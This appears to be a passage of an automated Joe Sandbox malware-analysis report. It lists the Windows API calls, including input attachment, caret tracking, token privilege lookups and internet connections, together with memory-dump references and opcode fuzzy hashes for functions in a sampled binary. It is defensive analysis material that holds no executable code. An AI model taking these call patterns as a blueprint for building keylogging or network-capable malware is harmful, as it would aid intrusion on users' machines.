                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: 011530dd7f70cefb8cb2a0fda1570a362452fb2e7976c117a5aba9f7f591ee48
                                                                                                                        • Instruction ID: 317f3b2ff5c54405d3272cbb21605d32e8d4250efee2a491d84ea3325b2d3b94
                                                                                                                        • Opcode Fuzzy Hash: 011530dd7f70cefb8cb2a0fda1570a362452fb2e7976c117a5aba9f7f591ee48
                                                                                                                        • Instruction Fuzzy Hash: 4F312830E4068C5AFF358A678C047FA7BAEBB49320F04431BE691921D1C37D4995F751
                                                                                                                        APIs
                                                                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00FB644B
                                                                                                                        • __isleadbyte_l.LIBCMT ref: 00FB6479
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FB64A7
                                                                                                                        • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00FB64DD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3058430110-0
                                                                                                                        • Opcode ID: 6bc96badfb199e9edf6847bafb22bdd2c8d053f81b50f9805ec1684fb913bcb8
                                                                                                                        • Instruction ID: 41186d767a3faa09a08dfa12e63b4ed11ca15c73891091090194a77bb4a2284d
                                                                                                                        • Opcode Fuzzy Hash: 6bc96badfb199e9edf6847bafb22bdd2c8d053f81b50f9805ec1684fb913bcb8
                                                                                                                        • Instruction Fuzzy Hash: 8231AA31A00A46EFDB26CF66C845BEA7BA9BF41320F154429F864C7191EB39D851EB90
                                                                                                                        APIs
                                                                                                                        • GetForegroundWindow.USER32 ref: 01005189
                                                                                                                          • Part of subcall function 00FE387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00FE3897
                                                                                                                          • Part of subcall function 00FE387D: GetCurrentThreadId.KERNEL32 ref: 00FE389E
                                                                                                                          • Part of subcall function 00FE387D: AttachThreadInput.USER32(00000000,?,00FE52A7), ref: 00FE38A5
                                                                                                                        • GetCaretPos.USER32(?), ref: 0100519A
                                                                                                                        • ClientToScreen.USER32(00000000,?), ref: 010051D5
                                                                                                                        • GetForegroundWindow.USER32 ref: 010051DB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2759813231-0
                                                                                                                        • Opcode ID: 79340acb4bb38b54b41ea84249ee1839effb89b2658c9a70a5d8bf2754491944
                                                                                                                        • Instruction ID: a0ad6b2b8229b8d219508c0b93e660e70deb79c36df87ac360dc57dab92a9a13
                                                                                                                        • Opcode Fuzzy Hash: 79340acb4bb38b54b41ea84249ee1839effb89b2658c9a70a5d8bf2754491944
                                                                                                                        • Instruction Fuzzy Hash: 8F313071900108AFDB14EFB5CC859EFB7F9EF88300F14406AE456E7241EA799E05DBA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • GetCursorPos.USER32(?), ref: 0100C7C2
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00FBBBFB,?,?,?,?,?), ref: 0100C7D7
                                                                                                                        • GetCursorPos.USER32(?), ref: 0100C824
                                                                                                                        • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00FBBBFB,?,?,?), ref: 0100C85E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2864067406-0
                                                                                                                        • Opcode ID: deac8fbf2f28cb5013d7e129e5a7b075ed10598462d395a331a087d132c5ed03
                                                                                                                        • Instruction ID: 5c585daf47ccbf7f0ef4c93a6e6c18677af0665ebe5d5a46334b18c137c00664
                                                                                                                        • Opcode Fuzzy Hash: deac8fbf2f28cb5013d7e129e5a7b075ed10598462d395a331a087d132c5ed03
                                                                                                                        • Instruction Fuzzy Hash: F631A535500018AFFB26CF58C998EEA7FF5FB0A320F0442D9FA858B291D7365A50DB64
                                                                                                                        APIs
                                                                                                                        • __setmode.LIBCMT ref: 00FA0BF2
                                                                                                                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE7B20,?,?,00000000), ref: 00F85B8C
                                                                                                                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE7B20,?,?,00000000,?,?), ref: 00F85BB0
                                                                                                                        • _fprintf.LIBCMT ref: 00FA0C29
                                                                                                                        • OutputDebugStringW.KERNEL32(?), ref: 00FD6331
                                                                                                                          • Part of subcall function 00FA4CDA: _flsall.LIBCMT ref: 00FA4CF3
                                                                                                                        • __setmode.LIBCMT ref: 00FA0C5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 521402451-0
                                                                                                                        • Opcode ID: b80332dfa19dba61da53ee412aa4fa7c8da7f845ef2c9a70fa440be8a1e68738
                                                                                                                        • Instruction ID: 9469c0448925057d2239b6cae1b260504306fa0f28917fcc5b49af52952835af
                                                                                                                        • Opcode Fuzzy Hash: b80332dfa19dba61da53ee412aa4fa7c8da7f845ef2c9a70fa440be8a1e68738
                                                                                                                        • Instruction Fuzzy Hash: 011136B29042047FCB04B7B4AC879FE7B699F86330F14011AF20497282DFAD6D42B791
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FD8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FD8669
                                                                                                                          • Part of subcall function 00FD8652: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8673
                                                                                                                          • Part of subcall function 00FD8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8682
                                                                                                                          • Part of subcall function 00FD8652: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8689
                                                                                                                          • Part of subcall function 00FD8652: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD869F
                                                                                                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00FD8BEB
                                                                                                                        • _memcmp.LIBCMT ref: 00FD8C0E
                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00FD8C44
                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 00FD8C4B
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1592001646-0
                                                                                                                        • Opcode ID: c0955e5bc5d921209754af0dc6547a19dc33b444be0801ed672ce770b5e77262
                                                                                                                        • Instruction ID: 34881afaa007c0fe44bbc2ea213ea1faba79b39489420ce1a7c637b7919c4951
                                                                                                                        • Opcode Fuzzy Hash: c0955e5bc5d921209754af0dc6547a19dc33b444be0801ed672ce770b5e77262
                                                                                                                        • Instruction Fuzzy Hash: 9421AE71E11209EFDB10DFA4C944BEEB7B9EF40390F08409AE454A7340EB35AE06EB60
                                                                                                                        APIs
                                                                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00FF1A97
                                                                                                                          • Part of subcall function 00FF1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00FF1B40
                                                                                                                          • Part of subcall function 00FF1B21: InternetCloseHandle.WININET(00000000), ref: 00FF1BDD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$CloseConnectHandleOpen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1463438336-0
                                                                                                                        • Opcode ID: a00152de32c1a9df24ca91cc6ccb0a1a84630562dd6365b6055ea748182c745c
                                                                                                                        • Instruction ID: e3b34bd3fac96a5f70da9872a0fbedc6a78866545cde01c0cf9494365a7c312e
                                                                                                                        • Opcode Fuzzy Hash: a00152de32c1a9df24ca91cc6ccb0a1a84630562dd6365b6055ea748182c745c
                                                                                                                        • Instruction Fuzzy Hash: A621CF32200609FFEB229F608C00FBAB7A9FF84710F10001AFB45D6660EB759811BBA1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00FDF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00FDE1C4,?,?,?,00FDEFB7,00000000,000000EF,00000119,?,?), ref: 00FDF5BC
                                                                                                                          • Part of subcall function 00FDF5AD: lstrcpyW.KERNEL32(00000000,?,?,00FDE1C4,?,?,?,00FDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00FDF5E2
                                                                                                                          • Part of subcall function 00FDF5AD: lstrcmpiW.KERNEL32(00000000,?,00FDE1C4,?,?,?,00FDEFB7,00000000,000000EF,00000119,?,?), ref: 00FDF613
                                                                                                                        • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00FDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00FDE1DD
                                                                                                                        • lstrcpyW.KERNEL32(00000000,?,?,00FDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00FDE203
                                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl,?,00FDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00FDE237
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrcmpilstrcpylstrlen
                                                                                                                        • String ID: cdecl
                                                                                                                        • API String ID: 4031866154-3896280584
                                                                                                                        • Opcode ID: e707b8fb0af7d6483610f66904bbe0a298379bcdec77c0630b3b6d12a9adb5fc
                                                                                                                        • Instruction ID: e1853a453836eebc4edc94f9df8a079b187b3b25a86571207e76931e8e00a6a1
                                                                                                                        • Opcode Fuzzy Hash: e707b8fb0af7d6483610f66904bbe0a298379bcdec77c0630b3b6d12a9adb5fc
                                                                                                                        • Instruction Fuzzy Hash: D611D336500301EFCB25AF64DC45E7A77B9FF85360B48802BF816CB254EB759851E7A0
                                                                                                                        APIs
                                                                                                                        • _free.LIBCMT ref: 00FB5351
                                                                                                                          • Part of subcall function 00FA594C: __FF_MSGBANNER.LIBCMT ref: 00FA5963
                                                                                                                          • Part of subcall function 00FA594C: __NMSG_WRITE.LIBCMT ref: 00FA596A
                                                                                                                          • Part of subcall function 00FA594C: RtlAllocateHeap.NTDLL(01680000,00000000,00000001,00000000,?,?,?,00FA1013,?), ref: 00FA598F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AllocateHeap_free
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 614378929-0
                                                                                                                        • Opcode ID: 2cb01a36c33a90cde36247d3bb0e67c8a7a85d05aa55c1b7f4133675420252af
                                                                                                                        • Instruction ID: 054f3711bc371803952dbb1a9ea1b1b7ebcefc25c61e4c43de044c53a8d8eeea
                                                                                                                        • Opcode Fuzzy Hash: 2cb01a36c33a90cde36247d3bb0e67c8a7a85d05aa55c1b7f4133675420252af
                                                                                                                        • Instruction Fuzzy Hash: 4A113AB2D04A06AFCB312F75AC4179D37D55F05BF0F284429F9449A281DFBD8941BB50
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00F84560
                                                                                                                          • Part of subcall function 00F8410D: _memset.LIBCMT ref: 00F8418D
                                                                                                                          • Part of subcall function 00F8410D: _wcscpy.LIBCMT ref: 00F841E1
                                                                                                                          • Part of subcall function 00F8410D: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00F841F1
                                                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00F845B5
                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F845C4
                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00FBD6CE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1378193009-0
                                                                                                                        • Opcode ID: c752f7380336ed9b32d04b2a687cdde129291040abb41d19f204dd9862527bf9
                                                                                                                        • Instruction ID: 8a167d1d725e6f2e008dd8357eacabcfdd12f9414d8d54490f0c3b6ef5c7fc31
                                                                                                                        • Opcode Fuzzy Hash: c752f7380336ed9b32d04b2a687cdde129291040abb41d19f204dd9862527bf9
                                                                                                                        • Instruction Fuzzy Hash: 85213A71904784AFEB339B24C845BEBBBEC9F01314F04009EE28D96145D7752A84AF42
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00FE7B20,?,?,00000000), ref: 00F85B8C
                                                                                                                          • Part of subcall function 00F85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00FE7B20,?,?,00000000,?,?), ref: 00F85BB0
                                                                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00FF66AC
                                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00FF66B7
                                                                                                                        • _memmove.LIBCMT ref: 00FF66E4
                                                                                                                        • inet_ntoa.WSOCK32(?), ref: 00FF66EF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1504782959-0
                                                                                                                        • Opcode ID: 054e17f0e7df8d67a86395f6ba8ac7f8c9bc25463548193543f5a1aafdfaf263
                                                                                                                        • Instruction ID: ee6c3c40cbf2d3ee5f017011e8b795059f354b28abd62498f877a780e5e52851
                                                                                                                        • Opcode Fuzzy Hash: 054e17f0e7df8d67a86395f6ba8ac7f8c9bc25463548193543f5a1aafdfaf263
                                                                                                                        • Instruction Fuzzy Hash: 79116D36900509AFCB05FBA4DD86DEEB7B8BF44710B184065F502A7261EF39AF05EB61
                                                                                                                        APIs
                                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00FD9043
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD9055
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD906B
                                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00FD9086
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 92d74f3c659697a9c1300edee1f803a2f31530801cbf4412b3ad90898918b841
                                                                                                                        • Instruction ID: 7fa2f0bef1c04b61b32dc07e6950e16f0cc3c21e068ff89df3857334287ac561
                                                                                                                        • Opcode Fuzzy Hash: 92d74f3c659697a9c1300edee1f803a2f31530801cbf4412b3ad90898918b841
                                                                                                                        • Instruction Fuzzy Hash: 96115E7A900218FFDB11DFA5CC84F9DBB75FB48310F204096E904B7250D6726E11EB90
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                                                                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 00F812D8
                                                                                                                        • GetClientRect.USER32(?,?), ref: 00FBB84B
                                                                                                                        • GetCursorPos.USER32(?), ref: 00FBB855
                                                                                                                        • ScreenToClient.USER32(?,?), ref: 00FBB860
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4127811313-0
                                                                                                                        • Opcode ID: 1b43a1a9c50f4094c3e8ab09cbea6b38c104967c6e630d6ce786ca9c91a30f7f
                                                                                                                        • Instruction ID: a618137301a79122f794d8a45538f8cd91ba91fb9e9505a046b3865261ae2232
                                                                                                                        • Opcode Fuzzy Hash: 1b43a1a9c50f4094c3e8ab09cbea6b38c104967c6e630d6ce786ca9c91a30f7f
                                                                                                                        • Instruction Fuzzy Hash: BE114C35A0011AEFCB21EFA4D8859FE77BCFB05311F000556FA41E7141D735BA52ABA5
                                                                                                                        APIs
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FE01FD,?,00FE1250,?,00008000), ref: 00FE166F
                                                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00FE01FD,?,00FE1250,?,00008000), ref: 00FE1694
                                                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00FE01FD,?,00FE1250,?,00008000), ref: 00FE169E
                                                                                                                        • Sleep.KERNEL32(?,?,?,?,?,?,?,00FE01FD,?,00FE1250,?,00008000), ref: 00FE16D1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2036449101.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036509076.0000000001035000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036548517.000000000103F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2036562580.0000000001048000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_f80000_W2k2NLSvja.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CounterPerformanceQuerySleep
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2875609808-0
                                                                                                                        • Opcode ID: e421d4e5a7a2a75060a97e534b9135bf3accec9f3719c090191055e1c3a3b9f7
                                                                                                                        • Instruction ID: 9ffabda0e95d744f63459923873fd8902b1591b5df98f20b57970ffcc1298bd9
                                                                                                                        • Opcode Fuzzy Hash: e421d4e5a7a2a75060a97e534b9135bf3accec9f3719c090191055e1c3a3b9f7
                                                                                                                        • Instruction Fuzzy Hash: 59117C31C0051DD7CF10AFA7D848AEEBB78FF0A711F044059E980B6240CB355560ABD6
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2036462891.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
